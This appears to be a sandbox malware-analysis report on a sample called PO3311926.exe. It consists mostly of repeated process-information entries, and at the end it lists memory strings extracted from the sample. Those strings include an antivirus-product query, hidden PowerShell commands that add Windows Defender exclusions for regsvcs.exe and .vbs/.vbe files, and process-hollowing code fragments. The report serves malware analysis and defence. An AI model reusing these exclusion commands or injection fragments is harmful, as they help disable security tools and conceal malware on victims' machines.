Source: C:\Users\user\Desktop\PO3311926.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\wscript.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe |
Process information set: NOOPENFILEERRORBOX |
|
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")o7 |
memstr_db719c70-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endfunc:/ |
memstr_52d311fb-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: endifwt |
memstr_1adea4ad-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide) |
memstr_48a30753-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)ckb |
memstr_7865dfaf-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)9hh |
memstr_a469d4bb-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)5z |
memstr_d316f5f9-8 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)ad |
memstr_fa9672a1-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($var94, 1, "current_user")a( |
memstr_f885897a-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($binbuffer, 1, $binary) |
memstr_2b5dc15c-4 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 877b273k |
memstr_ccf5875e-9 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dllstructsetdata($var93, 1, "0x401fffff")}( |
memstr_4ec5496e-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $ppointer = dllstructgetptr($tbinary) |
memstr_bdc18e6f-2 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $idata = dllstructgetdata($tenries, 1, $i) |
memstr_a2719535-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: func _runbinary_iswow64process($handlerpro) |
memstr_f2894a66-3 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ppeb = dllstructgetdata($tcontext, "ebx") |
memstr_ddfa9af3-b |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ppeb = dllstructgetdata($tcontext, "rdx") |
memstr_4b39e8ef-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: if @error then return seterror(3, 0, false) |
memstr_a9cd552d-1 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $idelta = $paddressnew - $paddressold |
memstr_9f8e7e91-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $inumberofentries = ($isizeofblock - 8) / 2 |
memstr_a6350ff9-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: $ssssss = stringreplace($ssssss, "/", "0") |
memstr_b71ffba6-6 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 2y$5) |
memstr_42e24c29-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $isizeofrawdata, $ppointertorawdatajwo |
memstr_7347109e-e |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: local $pmodule = dllstructgetptr($tmodule) |
memstr_9ba38748-7 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 029mujyu56dqv8iye)< |
memstr_aaf46e8f-d |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: 1l68fhh2nt3yvw9kku4fnp2 |
memstr_f0264e07-a |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: okab6221132e57hr423 |
memstr_16c221f0-0 |
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: zf43tpn47s51o5454d6 |
